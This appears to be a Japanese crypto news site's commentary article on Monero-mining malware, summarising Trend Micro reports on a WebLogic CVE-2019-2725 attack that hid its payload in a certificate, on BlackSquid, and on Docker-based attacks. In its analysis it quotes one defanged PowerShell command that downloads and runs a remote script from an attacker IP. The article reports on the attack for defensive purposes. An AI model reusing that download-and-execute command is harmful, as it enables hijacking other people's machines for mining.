WebX完全ガイド
TOP 新着一覧 取引所 WebX
CoinPostで今最も読まれています

現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察

画像はShutterstockのライセンス許諾により使用

マイニングマルウェアの脅威が絶えない
トレンドマイクロ社が、仮想通貨モネロをマイニングするマルウェアの脅威について報告書を公開した。当該脆弱性の分析、そして現在も存在している端末に侵入してマイニングを行うマルウェアについて確認する。

トレンドマイクロ社が報告書を公開

サイバーセキュリティを専門とする「トレンドマイクロ社」は6月10日、マイニングマルウェアの脅威について報告書を公開した。

公開された報告書は、【Oracle Weblogic】というソフトウェアの脆弱性(CVE-2019-2725)を利用して仮想通貨モネロをマイニングするマルウェアに関するものだ。当該脆弱性の分析、そして2019年に入ってからも続く、端末に侵入してマイニングを行うマルウェア(ここではマイニングマルウェアと呼称する)について見ていきたい。

トレンドマイクロ社の報告から見えてくるもの

このマルウェアに関する分析は、SANS ISC INFOSECフォーラムが情報源となっている。

そもそもOracle WebLogicは、JAVAが動くアプリケーションサーバーだ。もう少し詳しく説明すると、オラクル社が提供する業務用ミドルウェアや開発者向け製品などのソフトウェア製品群であり、エンジニアを除けば普通は扱うことはないだろう。

しかし、脆弱性の利用方法を見ていくと興味深い点が見つかる。ブラウザはHTTPSで暗号化された通信を行うため、相手が正しいURL(例えば coinpost.jp)であることを証明書を使って確認する。そして、今回はこの証明書に攻撃のペイロード(実際に攻撃を行うためのコード)が含まれていた。

以下の画像は、証明書を実際に見たことがある人向けだが、一見、普通の証明書に見える。

出典 : TREND MICRO

しかしこれをデコードすると、攻撃ペイロードのPowershellスクリプトが含まれていることが分かる。URLはhxxpとなっているが、特定のIPアドレスに通信を行っていることが分かるだろうか。この処理が行われてしまうと、update.ps1というスクリプトが実行され、勝手にモネロをマイニングされてしまうのだ。

iex(New-ObjectNet.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

証明書を利用してマルウェアを配布するというアイデア自体は目新しいものではない。 昨年時点で概念実証は行われており、Excelをマクロを含めて実行させるなど、実行可能であることが示されていた。

一方で今回の事例を見ると、証明書に隠したスクリプト単体で動作するものではなく、特定IPへの通信は複雑な技術を用いずに通信される仕組みになっている。つまり、この通信をマルウェア対策ソフトウェアなどで検知される可能性があるということだ。この点は、まだまだ攻撃に改良の余地があることを示しており、報告書でもテストの可能性があると述べている。

活発化するマイニングマルウェアによる攻撃

ビットコインなど暗号資産の価格が上昇するに伴い、攻撃者の活動も活発化している様子だ。 6月10日には8つの脆弱性を利用してマイニングマルウェアを送り込むBlackSquidについて、6月11日にはインターネットから接続可能なデバイスを探索した上でDockerコンテナを送り込むという手口に関して、同様にトレンドマイクロ社が日本語で注意喚起している。

前者のBlackSquidは、いずれも比較的古い脆弱性(EternalBlueやDoublePalserと呼ばれるもの等)を対象としており、恐らく既存のマルウェアなどを組み合わせたものと考えられる。

攻撃結果として、やはりモネロのマイニングを行うマイナーXMRigを起動する。 タイと米国で多く検出されたということだが、実装されていない機能も存在することから、将来的にさらなる開発が進められる可能性があるとのことだ。

エラーを含むコードや意図的にスキップされた機能を考慮すると、このマルウェアは開発およびテストの段階にあると考えられる。今後、不正アクセスや情報窃取などのさまざまな攻撃に利用されるかもしれない。あるいは、GPUリソースの有無によってコンポーネントを使い分けながら最も多くの利益を上げられる方法を調査しているのかもしれない。

さらに、彼らは大きな資本投下はせずに特定の標的を定めようとしている可能性もある。そのように考えられる理由は、BlackSquidが利用する脆弱性攻撃コードおよび手口の大多数がアンダーグラウンドで共有されているものであることや、「Shodan」のような有料のサービスを利用して対象を絞り込まずにランダムに生成したIPアドレスに攻撃を仕掛けている点だ。

また、後者のDockerコンテナを用いた手口でも、やはりMoneroを採掘するマイナーが含まれていた。Dockerに代表されるコンテナ技術は、LinuxやWindowsといったOSそれ自体を管理する手間を省力化できるなどの理由で急速に普及している。一方、新しい技術であることから、設定ミスがあると攻撃に晒されてしまう事例と言える。

出典 : TREND MICRO

おわりに

トレンドマイクロ社から報じられた攻撃について、複数の種類のマイニングマルウェアが出回っている点を紹介した。攻撃者がモネロをマイニングするのは利益や匿名性といった点を考慮した結果だと思われるが、将来も同じとは限らない。

また、暗号資産のマイニングに限らず、脆弱な環境は様々な形で悪用されてしまうだろう。ユーザー側の対策としては、OSやソフトウェアはなるべく最新にアップデートしたり、何か新しいものを取り入れるときは公式の情報を確認したり、仕組みを理解して使うことが大切だ。

坪 和樹

Twitter:https://twitter.com/TSB_KZK

Linkedin:https://www.linkedin.com/in/tsubo/

プロフィール:AWSで働くエンジニア、アイルランド在住。MtGoxやThe DAOでは被害を受けたが、ブロックチェーンのセキュリティに興味を持ち続けている。セキュリティカンファレンスでの講演、OWASP Japanの運営協力やMini Hardeningといったイベント立ち上げなど、コミュニティ活動も実績あり。

CoinPostの関連記事

流出した2300万XRP(リップル)の行方、仮想通貨交換所が一部の売却阻止に成功
仮想通貨取引所GateHubから総額23,200,000XRP(約10億円)の仮想通貨XRPが流出した事件で、交換サービスChangeNowはその一部の差し止めに成功したことがわかった。
仮想通貨「ミキシングサービス」の相次ぐ閉鎖、資金引き出しに関するリスクも
大手ミキシングサービスBitBlenderが閉鎖してサービス停止が発表された。同様のサービスの閉鎖が相次いでおり、仮想通貨ビットコインなど預けた資産が取り出せなくなるケースが多発している。
CoinPost App DL
厳選・注目記事
注目・速報 市況・解説 動画解説 新着一覧
07/02 木曜日
15:22
大阪府、AI・ブロックチェーン実証実験に補助金 上限1000万円
大阪府が先駆的金融市場等形成支援事業補助金の公募を開始した。ブロックチェーンやAI等を用いた金融サービスの実証実験が対象で、補助上限は1件あたり1000万円。公募期間や対象要件、補助率を解説する。
14:37
Kウェーブ・メディア、ビットコイン保有ゼロに 1万BTC目標から転換
Kウェーブ・メディアが保有する全ビットコインを売却し、財務戦略を一時停止した。2025年に掲げた1万BTC取得目標は達成前に撤回され、AIインフラ事業へ軸足を移す。売却の経緯をSEC提出書類をもとに整理する。
13:55
MiCA全面施行、EUでポーランドのみ未対応 仮想通貨企業2000社が認可なしで窮地に
2026年7月1日のMiCA全面施行に伴い、ポーランドのみが国内法制化に至らず、規制の空白状態となっている。同国内約2,000社の仮想通貨事業者は自国でのCASP認可取得手段を失い、他国でのライセンス取得か事業撤退の選択を迫られている。
13:05
仮想通貨ハッキング被害額、6月は120億円で前月比7%減少 ヒューマニティプロトコルが最大
ペックシールドの報告によると、6月の仮想通貨ハッキング被害は40件・約7,590万ドルで前月比7%減となった。最大被害はヒューマニティプロトコルからの流出だ。
11:48
仮想通貨大手306億円相当の中間選挙献金、米政治団体で首位に
仮想通貨業界が2026年米中間選挙の政治献金で総額1億8900万ドルに達し、全業種で最大の献金主体になったと米パブリック・シチズンが報告。リップル・コインベース・クリプトコムが主導し、AI業界も同様の手法で追随している。
11:00
サークルCEOがOUSDの優位性主張に反論、有識者「DAOと同じ末路」と懸念
140社超が支援するOUSDの登場を受け、ステーブルコイン大手サークルのCEOがコンソーシアム型モデルの限界を公開反論。米系証券各社はUSDCの競争優位が維持されるとの見方を示した。
10:42
スクウェア・エニックス、脱炭素アプリにブロックチェーン採用
スクウェア・エニックスとENECHANGEが脱炭素アクションを促す新アプリを共同開発。ミッション達成でポイントを得るゲーム設計とし、データ管理にはブロックチェーン「Oasys」を採用する。サービス開始は2026年内を予定。
09:48
イーサリアム財団、政府・機関向けガイド公開 中立性を強調
イーサリアム財団が政府・機関向けに、中立なインフラとしてのイーサリアムを解説する報告書を公開。稼働実績や経済的セキュリティなどOpenZeppelinの客観的指標をもとに他ブロックチェーンとの違いを示している。
09:45
ビットコイン、買い集め広がるもリスク残存 底打ちの確証なし=グラスノード
グラスノードが仮想通貨市場週間レポートを発表。ビットコイン下落局面でも買い集める層が広がる一方、ETF資金流出やレバレッジロング積み上がりなど不安要素も残ると分析した。
09:15
トルコ大手取引所がハイパーリキッドとポリマーケットを統合、規制取引所として初事例
トルコの大手仮想通貨取引所パリブが1日、ハイパーリキッドの無期限先物とポリマーケットの予測市場をアプリ内に統合した。規制済み取引所として世界初の事例とされ、NYSE・ナスダック株の取引ウェイトリストも開設した。
08:25
イーサリアムに新たな独立組織が誕生、機関向けの採用を促進へ
仮想通貨イーサリアムでイーサリアム・インスティテューショナルという独立組織が新たに誕生。L2を含めたイーサリアムのエコシステム全体の機関・企業への普及を加速させる。
07:35
スタンダードチャータード、DeFi拡大でモルフォに強気見通し
スタンダードチャータードはDeFi貸し借りプロトコルのモルフォ(Morpho)の分析カバレッジを開始、2030年末の目標価格を60ドルに設定した。ビットコインとイーサリアムを上回るリターンを見込み、DeFi資産の37倍拡大を原動力とする。
06:55
ロビンフッドチェーン正式公開、トークン化株式を120カ国超に提供
ロビンフッドが独自L2チェーン「ロビンフッドチェーン」のメインネットを正式公開。チェーンリンクをオラクルに採用し、NVDAやAAPL等のトークン化株を120カ国超のユーザーに提供。
06:20
ソラナ版予測市場『ワールド』がリリース、ファントムウォレットと統合
ソラナネイティブの予測市場プラットフォーム「ワールド」が7月1日に正式公開。ファントムウォレットに統合され、ビットコイン価格予測や2026年FIFAワールドカップの試合結果を予測取引できる。
05:55
米クラリティー法案の倫理条項、トランプ大統領の仮想通貨収益報告を受け民主党が明記要求
米クラリティー法案の倫理条項を巡り民主・共和両党の交渉が続く中、トランプ大統領の10億ドル超仮想通貨収益の資産報告を受け、民主党は法案への倫理条項明記を強く求めている。
今から始める仮想通貨特集
通貨データ
重要指標
一覧
新着指標
一覧